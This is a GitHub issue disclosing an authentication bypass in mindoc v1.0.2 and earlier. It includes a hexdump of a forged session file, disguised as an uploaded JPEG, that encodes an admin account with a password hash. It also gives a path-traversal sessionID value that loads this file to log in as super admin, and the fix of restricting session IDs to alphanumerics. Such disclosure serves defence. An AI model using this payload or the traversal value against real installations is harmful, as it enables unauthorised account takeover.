mindoc-org / mindoc

Golang实现的基于beego框架的接口在线文档管理系统
https://mindoc.com.cn/docs/mindochelp
Apache License 2.0
7.35k stars 1.91k forks source link

allow attacker unauthorized access to user account #384

Closed impakho closed 5 years ago

impakho commented 6 years ago

Target

mindoc <= v1.0.2

Description

login as a normal user, use markdown editor to upload payload.jpg(exploit session file, login as admin)

payload.jpg: (in hexdump)

0000000 0e ff 81 04 01 02 ff 82 00 01 10 01 10 00 00 fe
0000010 01 5a ff 82 00 03 06 73 74 72 69 6e 67 0c 05 00
0000020 03 75 69 64 03 69 6e 74 04 02 00 02 06 73 74 72
0000030 69 6e 67 0c 0d 00 0b 5f 5f 63 61 70 74 63 68 61
0000040 5f 5f 06 73 74 72 69 6e 67 0c 06 00 04 71 5a 41
0000050 52 06 73 74 72 69 6e 67 0c 12 00 10 4c 6f 67 69
0000060 6e 53 65 73 73 69 6f 6e 4e 61 6d 65 29 67 69 74
0000070 68 75 62 2e 63 6f 6d 2f 6c 69 66 65 69 36 36 37
0000080 31 2f 6d 69 6e 64 6f 63 2f 6d 6f 64 65 6c 73 2e
0000090 4d 65 6d 62 65 72 ff 83 03 01 01 06 4d 65 6d 62
00000a0 65 72 01 ff 84 00 01 0f 01 08 4d 65 6d 62 65 72
00000b0 49 64 01 04 00 01 07 41 63 63 6f 75 6e 74 01 0c
00000c0 00 01 08 52 65 61 6c 4e 61 6d 65 01 0c 00 01 08
00000d0 50 61 73 73 77 6f 72 64 01 0c 00 01 0a 41 75 74
00000e0 68 4d 65 74 68 6f 64 01 0c 00 01 0b 44 65 73 63
00000f0 72 69 70 74 69 6f 6e 01 0c 00 01 05 45 6d 61 69
0000100 6c 01 0c 00 01 05 50 68 6f 6e 65 01 0c 00 01 06
0000110 41 76 61 74 61 72 01 0c 00 01 04 52 6f 6c 65 01
0000120 04 00 01 08 52 6f 6c 65 4e 61 6d 65 01 0c 00 01
0000130 06 53 74 61 74 75 73 01 04 00 01 0a 43 72 65 61
0000140 74 65 54 69 6d 65 01 ff 86 00 01 08 43 72 65 61
0000150 74 65 41 74 01 04 00 01 0d 4c 61 73 74 4c 6f 67
0000160 69 6e 54 69 6d 65 01 ff 86 00 00 00 10 ff 85 05
0000170 01 01 04 54 69 6d 65 01 ff 86 00 00 00 fe 01 2c
0000180 ff 84 fe 01 27 01 02 01 05 61 64 6d 69 6e 02 ff
0000190 c1 63 4b 61 36 49 35 5a 70 6e 43 4b 43 54 71 71
00001a0 30 72 6c 56 6e 4f 75 32 7a 6c 48 69 46 74 72 38
00001b0 4e 2d 72 52 31 4b 52 65 72 56 79 75 6c 74 78 4c
00001c0 55 42 59 55 2d 52 48 30 7a 5f 6d 78 5a 38 45 59
00001d0 4a 72 79 61 5f 24 31 35 24 32 34 33 33 31 61 32
00001e0 32 63 39 38 64 66 34 65 62 36 63 31 33 33 30 32
00001f0 37 62 64 31 30 37 31 38 31 37 30 63 37 36 36 34
0000200 30 30 62 64 33 33 65 64 34 31 38 61 66 63 62 34
0000210 37 24 36 30 39 35 31 33 36 39 33 35 65 63 36 35
0000220 66 34 64 36 65 33 37 30 38 36 33 37 31 64 61 31
0000230 32 64 61 61 32 32 30 61 32 65 34 38 34 65 34 32
0000240 33 63 35 65 33 66 31 30 35 39 63 36 32 36 31 39
0000250 63 32 01 05 6c 6f 63 61 6c 02 0f 61 64 6d 69 6e
0000260 40 69 6d 69 6e 68 6f 2e 6d 65 02 1d 2f 73 74 61
0000270 74 69 63 2f 69 6d 61 67 65 73 2f 68 65 61 64 69
0000280 6d 67 75 72 6c 2e 6a 70 67 04 0f 01 00 00 00 0e
0000290 d3 75 dd 8f 36 6c 00 ef ff ff 02 0f 01 00 00 00
00002a0 0e d3 75 de 3e 36 05 5a e0 fe d4 00
00002ac

image

it return upload file path: https://cdn.iminho.me/uploads/blog/201811/attach_15652cb8d168634f.jpg

before modify sessionID, you're login as test123(normal account).

2

modify sessionID to aa/../../../../../uploads/blog/201811/attach_15652cb8d168634f.jpg

3

after modify sessionID, you're login as admin(super admin account).

Solution

check sessionID, only allow [a-zA-Z0-9]

Reference

astaxie/beego#3383

LockGit commented 6 years ago

nice